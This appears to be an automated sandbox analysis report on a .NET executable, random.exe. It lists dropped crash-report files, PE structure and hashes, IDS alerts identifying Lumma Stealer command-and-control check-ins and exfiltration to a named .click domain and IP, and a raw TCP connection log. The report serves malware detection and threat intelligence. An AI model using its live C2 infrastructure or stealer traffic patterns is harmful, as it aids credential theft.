                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.0.6.8.1.6.0.5.3.0.4.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.0.6.8.1.6.5.3.7.4.2.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.0.4.c.e.d.e.-.f.9.d.8.-.4.7.b.8.-.b.d.c.b.-.a.b.7.6.4.5.0.5.2.3.f.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.9.2.4.3.0.7.-.2.d.3.4.-.4.9.7.f.-.b.0.f.3.-.1.6.d.0.b.a.d.5.5.2.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.a.n.d.o.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.c.-.0.0.0.1.-.0.0.1.4.-.2.6.e.8.-.5.f.a.2.b.a.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.6.9.c.0.3.1.1.f.0.b.1.2.1.e.b.3.7.8.e.9.0.a.1.d.d.8.8.9.2.5.c.4.2.4.c.1.a.0.7.b.!.r.a.n.d.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Jan 8 10:46:56 2025, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):153425
                                      Entropy (8bit):3.743957904588716
                                      Encrypted:false
                                      SSDEEP:1536:g299GlU7uBojRVpN4uE2aOcLTgiAqbF0t5sCDJtTSUTfuFZjt:gUpVJ4uEqcLTgabF0zXPY5
                                      MD5:F46F0CAC4AC4B6DF778F7FDEBE909F4F
                                      SHA1:19A3FECCBB7E73D5462EE116C4E58ED8485A100F
                                      SHA-256:F7070EA10F665C4E1EDC4FFF355A1E0A51D1E894B8E58A3EECFAB5A9BF174F4B
                                      SHA-512:DC0AFCCEF9F8AA1A0C9BB43742E2586DE832B7BA7D754DCCE6A80DE84FE671D5B08514709FD55842E04471540CCAB6B5102A04D85A81C20232C2C69088A20C44
                                      Malicious:false
                                      Reputation:low
                                      Preview:MDMP..a..... ........W~g....................................$................/..........`.......8...........T...........P$...3......................................................................................................eJ......P.......GenuineIntel............T.......L....W~g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8360
                                      Entropy (8bit):3.688864417670488
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJiP6XaC6Y9OSUDGgmfbVJzyprt89bWtsfcrSm:R6lXJS6p6YkSUDGgmfbVJBWmfS
                                      MD5:E7AFA7CF72E3EB07C69DABE50AFC4818
                                      SHA1:CFBA44C679BA49B7B53BF9CF8C7D27122A745DEC
                                      SHA-256:90BA2ECAD71B0AB78C235008B6180BF0A3F5F078944699EBEE01621F82CA37BC
                                      SHA-512:30B09A484114FD3C80DE1D9792BF3914D4744A417DB959E2559121B47CC1F113F9448B24F6BA62EF4B06EE9F84B18AE04948291AB515262235D991F170FF34EB
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.3.2.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4730
                                      Entropy (8bit):4.427648113002853
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zspJg77aI9uAyWpW8VYJYm8M4JlR0dxPcf6FI+q8vpR0dxPcfRQycwd:uIjf7I78I7V1JlRlfDKpRlfRQycwd
                                      MD5:9414A14E706E7D7CD712E743718FC3F8
                                      SHA1:1EB9D634FB8048BAA53982AA7B409A8BABEAB6F7
                                      SHA-256:05D1195AF188D10216386274498377711D84C240CDE0CB783E21537AC5F7358C
                                      SHA-512:113B3328768E4CD72802953E5DA2F544BF927E122C7407098EC193DF8532450FBC1550177CF92118AE7BF2D4B02C6F62CAF1D00599B750BB86D73EA15DCA2062
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666829" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.465510249772632
                                      Encrypted:false
                                      SSDEEP:6144:2IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNjdwBCswSbWL:7XD94+WlLZMM6YFHN+WL
                                      MD5:B31BB713B15D94E1AA6303CCB713C049
                                      SHA1:970FD3537CAAC992083F70066ED7183A13B7180F
                                      SHA-256:8AC2F87484629DCDD8D8ED1034F921D56D6925F2B353B6398591F72CF9DD482C
                                      SHA-512:ECC2382BFD99EA050B41FC3FF3D13D45D17F9BEA6216E7D332318999DF4A10B78FD5A426ECBB08A707C9CF07D3262913B11F8634B4332B8F81727DB28F7294CD
                                      Malicious:false
                                      Reputation:low
                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....a...............................................................................................................................................................................................................................................................................................................................................Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.968250820517949
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:random.exe
                                      File size:349'696 bytes
                                      MD5:6446a00eb59754e15749af229b0d5217
                                      SHA1:69c0311f0b121eb378e90a1dd88925c424c1a07b
                                      SHA256:558fe8c705bbd035f886cc02acee3fdfa50398e74795f62d182e01225d58e2e2
                                      SHA512:63ffddb80faa7013dc4c665e1614ee7175d313868636e2d6bc9b8e1fa941134ff425f6f02c64a5509eb97a9be8bb87a2a9859cd57e72d10b7bbf13887cf0ba58
                                      SSDEEP:6144:AT1Bgj04zLS/70E7IodJ6vsVzsooEAPmIV49g2/GzrtXAlGSExj76f:Gb45zA7Fv6vsVOzm9t/Gzr9AsdP6f
                                      TLSH:6374131057CBC170DAA6273228504E206BEBF74D1DC38DCDB489759F961AFA20B677AC
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AL................0..B...........a... ........@.. ....................................`................................
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0x40619e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows cui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x61500x4b.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x598.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x610a0x1c.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x41a40x42003fd86cd640fad1b0e3c70a019e57ee90False0.5025449810606061data5.884139579646745IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x80000x5980x60097b5e78dd91bc3fa97e695160eb75d4aFalse0.41015625data4.031118916432586IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xa0000xc0x2000553d30171535035af0137d669b879daFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .BSS0xc0000x508000x50800271045b038ee6a75896b67a0c0c4955dFalse1.0003366411102483data7.999373253801423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0x80a00x30cdata0.41923076923076924
                                      RT_MANIFEST0x83ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-08T11:46:57.113787+01002058397ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)1192.168.2.4580051.1.1.153UDP
                                      2025-01-08T11:46:57.624092+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449731188.114.97.3443TCP
                                      2025-01-08T11:46:57.624092+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731188.114.97.3443TCP
                                      2025-01-08T11:46:58.190213+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731188.114.97.3443TCP
                                      2025-01-08T11:46:58.190213+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731188.114.97.3443TCP
                                      2025-01-08T11:46:58.723867+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449733188.114.97.3443TCP
                                      2025-01-08T11:46:58.723867+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733188.114.97.3443TCP
                                      2025-01-08T11:46:59.202131+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733188.114.97.3443TCP
                                      2025-01-08T11:46:59.202131+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733188.114.97.3443TCP
                                      2025-01-08T11:46:59.832079+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449736188.114.97.3443TCP
                                      2025-01-08T11:46:59.832079+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736188.114.97.3443TCP
                                      2025-01-08T11:47:02.382077+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449740188.114.97.3443TCP
                                      2025-01-08T11:47:02.382077+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740188.114.97.3443TCP
                                      2025-01-08T11:47:03.904266+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449742188.114.97.3443TCP
                                      2025-01-08T11:47:03.904266+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742188.114.97.3443TCP
                                      2025-01-08T11:47:05.131058+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449744188.114.97.3443TCP
                                      2025-01-08T11:47:05.131058+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744188.114.97.3443TCP
                                      2025-01-08T11:47:05.600120+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449744188.114.97.3443TCP
                                      2025-01-08T11:47:06.348119+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449746188.114.97.3443TCP
                                      2025-01-08T11:47:06.348119+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746188.114.97.3443TCP
                                      2025-01-08T11:47:06.352320+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449746188.114.97.3443TCP
                                      2025-01-08T11:47:10.415669+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449749188.114.97.3443TCP
                                      2025-01-08T11:47:10.415669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749188.114.97.3443TCP
                                      2025-01-08T11:47:10.911021+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749188.114.97.3443TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 8, 2025 11:46:57.137763023 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.137784958 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:57.137856960 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.140708923 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.140722990 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:57.624025106 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:57.624092102 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.628391027 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.628396988 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:57.628662109 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:57.680793047 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.777384996 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.777415037 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:57.777513027 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.190243959 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.190330982 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.190380096 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.193372011 CET49731443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.193382025 CET44349731188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.266021013 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.266072989 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.266220093 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.266607046 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.266623020 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.723664045 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.723866940 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.725111008 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.725121975 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.725379944 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:58.726619959 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.726674080 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:58.726687908 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202126980 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202174902 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202204943 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202233076 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202267885 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202284098 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.202301979 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202321053 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.202402115 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.202450991 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202636003 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202665091 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202706099 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202708006 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.202714920 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.202749014 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.206768036 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.206840038 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.206845999 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.258941889 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.258951902 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.288605928 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.288638115 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.288667917 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.288675070 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.288722992 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.288726091 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.288770914 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.288975000 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.288975000 CET49733443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.288995981 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.289002895 CET44349733188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.371968985 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.372009039 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.372081995 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.372623920 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.372634888 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.831990004 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.832078934 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.833568096 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.833575964 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.833828926 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.842977047 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.843137980 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.843166113 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:46:59.843224049 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:46:59.843230009 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:01.904930115 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:01.905030966 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:01.905087948 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:01.905261993 CET49736443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:01.905277967 CET44349736188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:01.924913883 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:01.924953938 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:01.925040960 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:01.925379038 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:01.925395012 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:02.382003069 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:02.382076979 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:02.386029005 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:02.386035919 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:02.386287928 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:02.401230097 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:02.401367903 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:02.401400089 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.018543005 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.018657923 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.018719912 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.051808119 CET49740443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.051834106 CET44349740188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.434041977 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.434077024 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.434143066 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.434894085 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.434906006 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.904181957 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.904266119 CET49742443192.168.2.4188.114.97.3
